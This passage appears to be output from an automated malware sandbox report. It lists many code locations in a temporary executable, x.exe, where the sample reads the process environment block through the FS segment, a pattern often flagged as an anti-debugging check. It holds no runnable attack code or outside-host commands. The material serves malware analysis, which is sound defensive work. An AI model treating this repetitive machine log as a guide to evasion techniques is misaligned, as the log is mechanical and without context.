Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]	4_2_01991070
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AC073 mov eax, dword ptr fs:[00000030h]	4_2_019AC073
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019FD070 mov ecx, dword ptr fs:[00000030h]	4_2_019FD070
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A06050 mov eax, dword ptr fs:[00000030h]	4_2_01A06050
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A2705E mov ebx, dword ptr fs:[00000030h]	4_2_01A2705E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A2705E mov eax, dword ptr fs:[00000030h]	4_2_01A2705E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01978397 mov eax, dword ptr fs:[00000030h]	4_2_01978397
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01978397 mov eax, dword ptr fs:[00000030h]	4_2_01978397
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01978397 mov eax, dword ptr fs:[00000030h]	4_2_01978397
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019D739A mov eax, dword ptr fs:[00000030h]	4_2_019D739A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019D739A mov eax, dword ptr fs:[00000030h]	4_2_019D739A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A438F mov eax, dword ptr fs:[00000030h]	4_2_019A438F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A438F mov eax, dword ptr fs:[00000030h]	4_2_019A438F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197E388 mov eax, dword ptr fs:[00000030h]	4_2_0197E388
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197E388 mov eax, dword ptr fs:[00000030h]	4_2_0197E388
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197E388 mov eax, dword ptr fs:[00000030h]	4_2_0197E388
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A5539D mov eax, dword ptr fs:[00000030h]	4_2_01A5539D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B33A0 mov eax, dword ptr fs:[00000030h]	4_2_019B33A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B33A0 mov eax, dword ptr fs:[00000030h]	4_2_019B33A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A33A5 mov eax, dword ptr fs:[00000030h]	4_2_019A33A5
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A3F3E6 mov eax, dword ptr fs:[00000030h]	4_2_01A3F3E6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0198A3C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0198A3C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0198A3C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0198A3C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0198A3C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0198A3C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019883C0 mov eax, dword ptr fs:[00000030h]	4_2_019883C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019883C0 mov eax, dword ptr fs:[00000030h]	4_2_019883C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019883C0 mov eax, dword ptr fs:[00000030h]	4_2_019883C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019883C0 mov eax, dword ptr fs:[00000030h]	4_2_019883C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A553FC mov eax, dword ptr fs:[00000030h]	4_2_01A553FC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A063C0 mov eax, dword ptr fs:[00000030h]	4_2_01A063C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B63FF mov eax, dword ptr fs:[00000030h]	4_2_019B63FF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0199E3F0 mov eax, dword ptr fs:[00000030h]	4_2_0199E3F0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0199E3F0 mov eax, dword ptr fs:[00000030h]	4_2_0199E3F0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0199E3F0 mov eax, dword ptr fs:[00000030h]	4_2_0199E3F0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A3C3CD mov eax, dword ptr fs:[00000030h]	4_2_01A3C3CD
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]	4_2_019903E9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]	4_2_019903E9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]	4_2_019903E9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]	4_2_019903E9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]	4_2_019903E9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]	4_2_019903E9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]	4_2_019903E9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]	4_2_019903E9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A3B3D0 mov ecx, dword ptr fs:[00000030h]	4_2_01A3B3D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197C310 mov ecx, dword ptr fs:[00000030h]	4_2_0197C310
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4132D mov eax, dword ptr fs:[00000030h]	4_2_01A4132D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4132D mov eax, dword ptr fs:[00000030h]	4_2_01A4132D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A0310 mov ecx, dword ptr fs:[00000030h]	4_2_019A0310
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BA30B mov eax, dword ptr fs:[00000030h]	4_2_019BA30B
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BA30B mov eax, dword ptr fs:[00000030h]	4_2_019BA30B
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BA30B mov eax, dword ptr fs:[00000030h]	4_2_019BA30B
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01977330 mov eax, dword ptr fs:[00000030h]	4_2_01977330
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A0930B mov eax, dword ptr fs:[00000030h]	4_2_01A0930B
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A0930B mov eax, dword ptr fs:[00000030h]	4_2_01A0930B
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A0930B mov eax, dword ptr fs:[00000030h]	4_2_01A0930B
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AF32A mov eax, dword ptr fs:[00000030h]	4_2_019AF32A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01979353 mov eax, dword ptr fs:[00000030h]	4_2_01979353
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01979353 mov eax, dword ptr fs:[00000030h]	4_2_01979353
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A3F367 mov eax, dword ptr fs:[00000030h]	4_2_01A3F367
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197D34C mov eax, dword ptr fs:[00000030h]	4_2_0197D34C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197D34C mov eax, dword ptr fs:[00000030h]	4_2_0197D34C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A2437C mov eax, dword ptr fs:[00000030h]	4_2_01A2437C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A55341 mov eax, dword ptr fs:[00000030h]	4_2_01A55341
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01987370 mov eax, dword ptr fs:[00000030h]	4_2_01987370
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01987370 mov eax, dword ptr fs:[00000030h]	4_2_01987370
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01987370 mov eax, dword ptr fs:[00000030h]	4_2_01987370
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]	4_2_01A02349
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]	4_2_01A02349
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]	4_2_01A02349
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]	4_2_01A02349
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]	4_2_01A02349
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]	4_2_01A02349
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]	4_2_01A02349
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]	4_2_01A02349
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]	4_2_01A02349
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]	4_2_01A02349
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]	4_2_01A02349
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]	4_2_01A02349
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]	4_2_01A02349
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]	4_2_01A02349
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]	4_2_01A02349
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4A352 mov eax, dword ptr fs:[00000030h]	4_2_01A4A352
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A0035C mov eax, dword ptr fs:[00000030h]	4_2_01A0035C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A0035C mov eax, dword ptr fs:[00000030h]	4_2_01A0035C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A0035C mov eax, dword ptr fs:[00000030h]	4_2_01A0035C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A0035C mov ecx, dword ptr fs:[00000030h]	4_2_01A0035C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A0035C mov eax, dword ptr fs:[00000030h]	4_2_01A0035C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A0035C mov eax, dword ptr fs:[00000030h]	4_2_01A0035C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A172A0 mov eax, dword ptr fs:[00000030h]	4_2_01A172A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A172A0 mov eax, dword ptr fs:[00000030h]	4_2_01A172A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A162A0 mov eax, dword ptr fs:[00000030h]	4_2_01A162A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A162A0 mov ecx, dword ptr fs:[00000030h]	4_2_01A162A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A162A0 mov eax, dword ptr fs:[00000030h]	4_2_01A162A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A162A0 mov eax, dword ptr fs:[00000030h]	4_2_01A162A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A162A0 mov eax, dword ptr fs:[00000030h]	4_2_01A162A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A162A0 mov eax, dword ptr fs:[00000030h]	4_2_01A162A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A492A6 mov eax, dword ptr fs:[00000030h]	4_2_01A492A6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A492A6 mov eax, dword ptr fs:[00000030h]	4_2_01A492A6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A492A6 mov eax, dword ptr fs:[00000030h]	4_2_01A492A6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A492A6 mov eax, dword ptr fs:[00000030h]	4_2_01A492A6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B329E mov eax, dword ptr fs:[00000030h]	4_2_019B329E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B329E mov eax, dword ptr fs:[00000030h]	4_2_019B329E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A092BC mov eax, dword ptr fs:[00000030h]	4_2_01A092BC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A092BC mov eax, dword ptr fs:[00000030h]	4_2_01A092BC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A092BC mov ecx, dword ptr fs:[00000030h]	4_2_01A092BC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A092BC mov ecx, dword ptr fs:[00000030h]	4_2_01A092BC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BE284 mov eax, dword ptr fs:[00000030h]	4_2_019BE284
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BE284 mov eax, dword ptr fs:[00000030h]	4_2_019BE284
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A00283 mov eax, dword ptr fs:[00000030h]	4_2_01A00283
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A00283 mov eax, dword ptr fs:[00000030h]	4_2_01A00283
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A00283 mov eax, dword ptr fs:[00000030h]	4_2_01A00283
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A55283 mov eax, dword ptr fs:[00000030h]	4_2_01A55283
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019902A0 mov eax, dword ptr fs:[00000030h]	4_2_019902A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019902A0 mov eax, dword ptr fs:[00000030h]	4_2_019902A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019952A0 mov eax, dword ptr fs:[00000030h]	4_2_019952A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019952A0 mov eax, dword ptr fs:[00000030h]	4_2_019952A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019952A0 mov eax, dword ptr fs:[00000030h]	4_2_019952A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019952A0 mov eax, dword ptr fs:[00000030h]	4_2_019952A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197B2D3 mov eax, dword ptr fs:[00000030h]	4_2_0197B2D3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197B2D3 mov eax, dword ptr fs:[00000030h]	4_2_0197B2D3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197B2D3 mov eax, dword ptr fs:[00000030h]	4_2_0197B2D3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A552E2 mov eax, dword ptr fs:[00000030h]	4_2_01A552E2
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AF2D0 mov eax, dword ptr fs:[00000030h]	4_2_019AF2D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AF2D0 mov eax, dword ptr fs:[00000030h]	4_2_019AF2D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]	4_2_01A312ED
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]	4_2_01A312ED
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]	4_2_01A312ED
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]	4_2_01A312ED
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]	4_2_01A312ED
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]	4_2_01A312ED
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]	4_2_01A312ED
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]	4_2_01A312ED
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]	4_2_01A312ED
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]	4_2_01A312ED
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]	4_2_01A312ED
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]	4_2_01A312ED
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]	4_2_01A312ED
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]	4_2_01A312ED
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AB2C0 mov eax, dword ptr fs:[00000030h]	4_2_019AB2C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AB2C0 mov eax, dword ptr fs:[00000030h]	4_2_019AB2C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AB2C0 mov eax, dword ptr fs:[00000030h]	4_2_019AB2C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AB2C0 mov eax, dword ptr fs:[00000030h]	4_2_019AB2C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AB2C0 mov eax, dword ptr fs:[00000030h]	4_2_019AB2C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AB2C0 mov eax, dword ptr fs:[00000030h]	4_2_019AB2C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AB2C0 mov eax, dword ptr fs:[00000030h]	4_2_019AB2C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A3F2F8 mov eax, dword ptr fs:[00000030h]	4_2_01A3F2F8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0198A2C3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0198A2C3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0198A2C3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0198A2C3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0198A2C3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019892C5 mov eax, dword ptr fs:[00000030h]	4_2_019892C5
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019892C5 mov eax, dword ptr fs:[00000030h]	4_2_019892C5
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019792FF mov eax, dword ptr fs:[00000030h]	4_2_019792FF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019902E1 mov eax, dword ptr fs:[00000030h]	4_2_019902E1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019902E1 mov eax, dword ptr fs:[00000030h]	4_2_019902E1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019902E1 mov eax, dword ptr fs:[00000030h]	4_2_019902E1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A55227 mov eax, dword ptr fs:[00000030h]	4_2_01A55227
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B7208 mov eax, dword ptr fs:[00000030h]	4_2_019B7208
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B7208 mov eax, dword ptr fs:[00000030h]	4_2_019B7208
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197823B mov eax, dword ptr fs:[00000030h]	4_2_0197823B
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01986259 mov eax, dword ptr fs:[00000030h]	4_2_01986259
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197A250 mov eax, dword ptr fs:[00000030h]	4_2_0197A250
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4D26B mov eax, dword ptr fs:[00000030h]	4_2_01A4D26B
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4D26B mov eax, dword ptr fs:[00000030h]	4_2_01A4D26B
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B724D mov eax, dword ptr fs:[00000030h]	4_2_019B724D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01979240 mov eax, dword ptr fs:[00000030h]	4_2_01979240
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01979240 mov eax, dword ptr fs:[00000030h]	4_2_01979240
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]	4_2_01A30274
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]	4_2_01A30274
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]	4_2_01A30274
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]	4_2_01A30274
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]	4_2_01A30274
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]	4_2_01A30274
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]	4_2_01A30274
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]	4_2_01A30274
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]	4_2_01A30274
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]	4_2_01A30274
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]	4_2_01A30274
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]	4_2_01A30274
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C1270 mov eax, dword ptr fs:[00000030h]	4_2_019C1270
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C1270 mov eax, dword ptr fs:[00000030h]	4_2_019C1270
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A9274 mov eax, dword ptr fs:[00000030h]	4_2_019A9274
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A3B256 mov eax, dword ptr fs:[00000030h]	4_2_01A3B256
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A3B256 mov eax, dword ptr fs:[00000030h]	4_2_01A3B256
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01984260 mov eax, dword ptr fs:[00000030h]	4_2_01984260
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01984260 mov eax, dword ptr fs:[00000030h]	4_2_01984260
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01984260 mov eax, dword ptr fs:[00000030h]	4_2_01984260
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197826B mov eax, dword ptr fs:[00000030h]	4_2_0197826B
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A005A7 mov eax, dword ptr fs:[00000030h]	4_2_01A005A7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A005A7 mov eax, dword ptr fs:[00000030h]	4_2_01A005A7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A005A7 mov eax, dword ptr fs:[00000030h]	4_2_01A005A7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BE59C mov eax, dword ptr fs:[00000030h]	4_2_019BE59C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B4588 mov eax, dword ptr fs:[00000030h]	4_2_019B4588
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197758F mov eax, dword ptr fs:[00000030h]	4_2_0197758F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197758F mov eax, dword ptr fs:[00000030h]	4_2_0197758F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197758F mov eax, dword ptr fs:[00000030h]	4_2_0197758F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01982582 mov eax, dword ptr fs:[00000030h]	4_2_01982582
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01982582 mov ecx, dword ptr fs:[00000030h]	4_2_01982582
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A135BA mov eax, dword ptr fs:[00000030h]	4_2_01A135BA
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A135BA mov eax, dword ptr fs:[00000030h]	4_2_01A135BA
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A135BA mov eax, dword ptr fs:[00000030h]	4_2_01A135BA
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A135BA mov eax, dword ptr fs:[00000030h]	4_2_01A135BA
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A3F5BE mov eax, dword ptr fs:[00000030h]	4_2_01A3F5BE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AF5B0 mov eax, dword ptr fs:[00000030h]	4_2_019AF5B0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AF5B0 mov eax, dword ptr fs:[00000030h]	4_2_019AF5B0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AF5B0 mov eax, dword ptr fs:[00000030h]	4_2_019AF5B0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AF5B0 mov eax, dword ptr fs:[00000030h]	4_2_019AF5B0
